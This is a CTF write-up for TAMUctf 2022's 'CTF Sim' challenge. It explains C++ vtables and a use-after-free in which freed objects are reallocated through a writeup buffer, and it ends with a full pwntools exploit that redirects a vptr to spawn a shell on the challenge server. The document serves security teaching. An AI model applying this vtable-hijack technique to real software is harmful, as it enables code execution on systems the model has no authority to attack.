TAMUctf 2022 – CTF Sim

Oops, your vpointer was redirected.


Challenge Description

Wanna take a break from the ctf to do another ctf?

Write-Up

Ooooh, a C++ challenge. And it's about CTFs. Seems like a fun little exercise.

Preliminary Observations and Analysis

We're provided a C++ file and its compiled ELF. Upon an initial browse through the source, we see something interesting:

void win() {
    system("/bin/sh");
}

void* win_addr = (void*)&win;

A win function is already provided, along with a global variable win_addr storing the address of win.

Now on to the fun stuff. We're given six classes with the solve virtual function: one base class and the other five inheriting and overriding solve.

struct challenges { virtual void solve() { /* ... */ } };
struct forensics : challenges { virtual void solve() { /* ... */ } };
struct reversing : challenges { virtual void solve() { /* ... */ } };
struct pwn : challenges { virtual void solve() { /* ... */ } };
struct web : challenges { virtual void solve() { /* ... */ } };
struct crypto : challenges { virtual void solve() { /* ... */ } };

We then have three action functions:

  1. downloadChallenge, which news one of the five derived classes,
    // -- Read choice, index from input. --
    if (choice == 1) {
        downloaded[index] = new forensics;
    }
    else if (choice == 2) {
        downloaded[index] = new reversing;
    }
    // ...
    else {
        downloaded[index] = new crypto;
    }
  2. solveChallenge, which selects a downloaded challenge, then calls ->solve() and deletes it,
    // -- Read index from input. --
    downloaded[index]->solve();
    delete downloaded[index];
    and
  3. submitWriteup, which calls mallocs with custom size.
    // -- Read length from input. --
    char* writeup = (char*)malloc(length);
    fgets(writeup, length, stdin); // Read writeup payload from input.

Interestingly, the malloced chunk isn't freed anywhere! Also in solveChallenge, the value of downloaded[i] isn't removed after being deleted... This is starting to smell like a double free or use-after-free vulnerability. But is it?

Let's start by defining helper functions in Python to help us perform actions:

def download_chal(category: int, save_index: int):
    if not (1 <= category <= 5 and 0 <= save_index <= 3):
        raise RuntimeError("bad bad")

    p.sendlineafter(b"> ", b'1')
    p.sendlineafter(b"> ", str(category).encode())
    p.sendlineafter(b"> ", str(save_index).encode())

def solve_chal(index: int):
    if not (0 <= index <= 3):
        raise RuntimeError("bad bad")
    
    p.sendlineafter(b"> ", b'2')
    p.sendlineafter(b"> ", str(index).encode())

def submit_writeup(content: bytes, length: int = None):
    if length is None:
        length = len(content) + 1
    elif len(content) >= length:
        raise RuntimeError("your math bad bad")
    
    if b'\n' in content:
        raise RuntimeError("bad bad newline")

    p.sendlineafter(b"> ", b'3')
    p.sendlineafter(b"> ", str(length).encode())
    p.sendlineafter(b"> ", content)

Now we just need to figure out how to call these, and what to call them with...

Virtual Tables

Ugh... virtual functions. They're convenient high-level features and great for polymorphism, but how do they actually work underneath?

My Google-fu did not fail me. I found a couple useful resources:

I'll try my best to summarise the wisdom found there:

  • If a class has a virtual function...
    • the class has a vtable, and
    • objects of the class contains an implicit "vptr" member.
      • In memory, the vptr is placed at the very beginning of the object.
      • The vptr points to the vtable of the class.
  • The vtable is a list of pointers to the concrete implementations of the virtual functions.
  • When a virtual function is called, the vtable is accessed through the vptr. The vtable is then used to look up the appropriate virtual function and pass it the appropriate parameters.

To better understand vtables and vpointers, here's a virtual function example in C++ along with a desugared version written in C.

C++ Version:

class Parent {
public:
    // void* vtable; // Implicit, but exists due to virtual functions.
    int parent_data;
    Parent(int data) : parent_data{data} {}

    virtual void foo(int x) { std::cout << "parent (" << parent_data << ") foo: " << x << std::endl; }
    virtual void bar(int x) { std::cout << "parent (" << parent_data << ") bar: " << x << std::endl; }
};

// Inherits Parent::parent_data and Parent::foo.
class Derived : public Parent {
public:
    // void* vtable; // Implicit for same reason as Parent.
    int derived_data;
    Derived(int data, int data2) : Parent{data}, derived_data{data2} {}

    // Overrides Parent::bar.
    virtual void bar(int x) { std::cout << "derived (" << parent_data << ", " << derived_data << ") bar: " << x << std::endl; }
};

int main() {
    Parent p{1};
    p.foo(2); // Parent::foo
    p.bar(3); // Parent::bar

    Derived d{5, 6};
    d.foo(7); // Parent::foo
    d.bar(8); // Derived::bar
}

(godbolt demo)

C Version:

typedef void (*funcptr_t)(); // Type alias for function pointers.

typedef struct {
    funcptr_t* vtable;
    int parent_data;
} Parent;

typedef struct {
    funcptr_t* vtable;
    int parent_data; // Inherited from Parent.
    int derived_data;
} Derived;

// Enumeration of virtual functions.
enum { VFUNCTION_FOO, VFUNCTION_BAR };

// Concrete implementations.
void parent__foo(Parent* p, int x) { printf("parent (%d) foo: %d\n", p->parent_data, x); }
void parent__bar(Parent* p, int x) { printf("parent (%d) bar: %d\n", p->parent_data, x); }
void derived__bar(Derived* d, int x) { printf("derived (%d, %d) bar: %d\n", d->parent_data, d->derived_data, x); }

// Virtual implementations (redirect).
void foo(Parent* p, int x) { p->vtable[VFUNCTION_FOO]((void*)p, x); }
void bar(Parent* p, int x) { p->vtable[VFUNCTION_BAR]((void*)p, x); }

// vtable definitions.
funcptr_t parent__vtable[] = {
    parent__foo,
    parent__bar,
};

funcptr_t derived__vtable[] = {
    parent__foo,
    derived__bar,
};

int main(void) {
    Parent p = {parent__vtable, 1};
    foo(&p, 2); // parent__foo
    bar(&p, 3); // parent__bar.

    Derived d = {derived__vtable, 5, 6};
    foo((Parent*)&d, 7); // parent__foo
    bar((Parent*)&d, 8); // derived__bar.
}

(godbolt demo, inspired from this gist)

So to reiterate and relate how this works with ctf_sim.cpp:

  • By observation, each class (challenge, forensic, reversing, etc.) has a virtual function.
  • Therefore, each class has a vtable.
  • Also, an object of any class (challenge, forensic, etc.) has a vptr.
  • This vptr points to the corresponding vtable of the class.
    • e.g. a forensic object will have a vptr pointing to the forensic vtable.
    • a pwn object will have a vptr pointing to the pwn vtable.

Exploiting the Binary with GDB

This section will walk through the hands-on aspect exploiting the ctf_sim binary using GDB. I try to go through the entire procedure to clarify the details, so it may be slightly long-winded. Feel free to skip to the conclusion.

To recap a bit, we know that...

  • when a virtual function is called, the function does a little double-dereference magic using the object's vptr.
  • there is a use-after-free/double-free vulnerability.
    • When solving a challenge, delete is called. But the pointer value isn't cleared.
      int main() {
          int* p = new int;
          // Suppose p == 0x404000.
          delete p;
          // Pointer value is still 0x404000, not NULL or anything else.
      }
    • We could...
      • make a new challenge at the same index? This would overwrite our use-after-free pointer... we probably don't want that.
      • solve the challenge again? This would call the virtual function and delete the pointer again.
      • submit a writeup? We might be able to use this to reallocate the chunk and overwrite object data with custom data! Let's explore this a bit more using GDB.

We'll try the following:

  1. Download challenge. This allocates a new chunk.
  2. Solve the downloaded challenge. This should free the chunk.
  3. Submit a writeup. This should reallocate the chunk, but with our custom data.
  4. Solve the downloaded challenge again. This should call a double deref on the vptr.

To understand the exploit the details better and what happens under the hood, we'll use GDB to step through the exploit.

A brief refresher on some commands we'll be using.

r               # Run the file.
c               # Continue running where we left off.
heap chunks     # View active chunks on the heap.
x /40wx <addr>  # View memory at address as hex data.
x /40wi <addr>  # View memory at address as instructions.
disas <sym>     # Disassemble a symbol.
b *<addr>       # Set a breakpoint at the specified address.
kill            # Useful for stopping the current run in case we make an oopsie and need to restart.

After starting up my Kali Linux VM, downloading the challenge onto it, and firing up GDB; we inspect the initial state of the heap.

$ gdb ctf_sim
r
^C
heap chunks

undefined

Ooo, looks a bit busy, even though we haven't malloced or newed anything yet! These are probably allocations from iostream buffers used to buffer the input and output streams. We'll ignore these for now as they aren't very important.

We perform our first action: downloading a challenge. The challenge type and index to store the challenge don't really matter, so we'll just go with the first option (new forensics) and index 0.

c
1
1
0

undefined

Let's pause again and check the state of the heap.

^C
heap chunks

undefined

Notice that there is now a new chunk with size 0x20 with some data in the first few bytes. Since we just allocated a forensics object, this is likely the vptr of that object.

Indeed, if we peek into the binary's memory using x /20wx 0x403d38, we see what looks like some vtables having a party:

undefined

We'll move on to the second step: solving the challenge. This step is rather simple, but I want to show how the vtable magic is done in assembly. Let's disassemble the solveChallenge() function and set a breakpoint near the hotspot.

disas solveChallenge
b *solveChallenge+191

Now we'll continue running and feed it input for solving our forensics challenge.

c
2
0

Our breakpoint gets triggered. Notice the interesting chain of addresses in the rax register in the image below. There's a chain of 3 addresses:

  1. the address of the forensics object vptr... which points to...
  2. the address of the forensics vtable... which points to...
  3. the address of forensics::solve...
    • which is eventually called in assembly (call rax)

So this is what happens when we call a virtual function... InTeReStInG!

Let's continue so that it finishes delete-ing the chunk, and let's check the heap state again:

c
^C
heap chunks

undefined

It appears that our forensics vptr has been replaced with some other data. 😢 But no worries! We'll just continue with our third action: submitting a writeup.

Since we want to reuse the chunk previously deallocated, we want to make sure the chunk we allocate when submitting the writeup isn't too big. But the chunk shouldn't be too small either: we want it to be at least 9 bytes, so that it could fit 8 bytes of payload plus a null terminator. So we'll settle for 16 bytes.

c
3
16
AABBCCDD

undefined

Let's check our heap.

^C
heap chunks

undefined

Sweet! We've overwritten the first 8 bytes of the chunk with our payload. Effectively, we've assigned a custom vptr to the forensics object.

"But bruh I thought our forensics object was deallocated!"

Well yes... but actually no... Objects in C/C++ are merely represented in memory as a sequence of bytes. You can interpret a sequence of bytes as any type. That's why casting across types is a thing in C/C++—albeit potentially dangerous. (In C, you'd use the usual cast (type*)&obj. In C++, you'd use reinterpret_cast<type*>(&obj).)

Now when we call solveChallenge, the line downloaded[index]->solve() will treat our chunk as a challenge*. It was originally supposed to be a char*, since we submitted a writeup. But since types don't matter in the assembly/memory level, the chunk is now a challenge* for all intents and purposes.

Since the chunk is treated as a challenge*, the assembly will try to double-deref the vptr... which is our payload from submitting the writeup.

Boom! Exploit.

If we continue running the program, a SIGSEGV occurs since it tries to dereference 0x4444434342424141 (which is "AABBCCDD", but packed to 64 bits).

undefined

Later on, we'll use win_addr instead of "AABBCCDD" for our payload; so that when the solve() virtual function does its magic, it will call win() instead.

Altogether

Combining our knowledge of vtables/vpointers with a little bit of heap knowledge, we come up with the following exploit:

# downloaded[0] = new forensics;   (vptr points to forensic's vtable.)
download_chal(1, 0)

# delete downloaded[0];    (chunk is moved to tcache/fast bin. downloaded[0] itself is unchanged!)
solve_chal(0)

# Chunk is allocated-- reusing the chunk previously deallocated.
# Overwrite vptr of downloaded[0] with &(&win).
submit_writeup(p64(elf.sym['win_addr']), 0x10)

# downloaded[0]->solve() triggers double dereference (due to virtual function resolution) and calls win()!
solve_chal(0)

To explain the "little bit of heap knowledge", we just need to understand that C++'s new/delete behaves like C's malloc/free: new will allocate a chunk, and delete will move the chunk to a bin. There are tons of different bins (small, large, fast, unsorted). But intuitively, the next new with a similar chunk size will reuse the chunk, meaning we overwrite the same memory previously allocated!

This story is reflected in the code above.

  • We download a challenge. This will new a chunk. The index and type of challenge (forensic, pwn, etc.) don't really matter, but just make sure we keep reusing the same index.
  • We solve a challenge. Here we delete the chunk previously allocated.
  • We submit a writeup. This mallocs a chunk and inserts a payload of win_addr.
    • The size to malloc can be anywhere between 0x8 (exclusive) and 0x18 (inclusive). I used 0x10 since it looks pretty.
    • Anything equal or less than 0x8 means our 8-byte payload will be cut off early. All 8 bytes are important, because the vptr machinery will be using the entire 8 bytes.
    • Anything above 0x18 will allocate a new chunk instead of reusing the previously deallocated chunk.
  • We solve the same challenge as before. This triggers a call to a virtual function which double-derefs our payload (win_addr), calling win() and giving us a shell. PROFIT!

Solve Scripts

from pwn import *

binary = 'ctf_sim'

context.binary = binary
context.log_level = 'debug'

elf = ELF(binary)
rop = ROP(binary)

p = remote("tamuctf.com", 443, ssl=True, sni="ctf-sim")


def download_chal(category: int, save_index: int):
    if not (1 <= category <= 5 and 0 <= save_index <= 3):
        raise RuntimeError("bad bad")

    p.sendlineafter(b"> ", b'1')
    p.sendlineafter(b"> ", str(category).encode())
    p.sendlineafter(b"> ", str(save_index).encode())

def solve_chal(index: int):
    if not (0 <= index <= 3):
        raise RuntimeError("bad bad")
    
    p.sendlineafter(b"> ", b'2')
    p.sendlineafter(b"> ", str(index).encode())

def submit_writeup(content: bytes, length: int = None):
    if length is None:
        length = len(content) + 1
    elif len(content) >= length:
        raise RuntimeError("your math bad bad")
    
    if b'\n' in content:
        raise RuntimeError("bad bad newline")

    p.sendlineafter(b"> ", b'3')
    p.sendlineafter(b"> ", str(length).encode())
    p.sendlineafter(b"> ", content)

# downloaded[0] = new forensics;   (vptr points to forensic's vtable.)
download_chal(1, 0)

# delete downloaded[0];    (chunk is moved to tcache/fast bin. downloaded[0] itself is unchanged!)
solve_chal(0)

# Chunk is allocated-- reusing the chunk previously deallocated.
# Overwrite vptr of downloaded[0] with &(&win).
submit_writeup(p64(elf.sym['win_addr']), 0x10)

# downloaded[0]->solve() triggers double dereference (due to virtual function resolution) and calls win()!
solve_chal(0)

p.interactive()

Flag

gigem{h34pl355_1n_53477l3}

Share on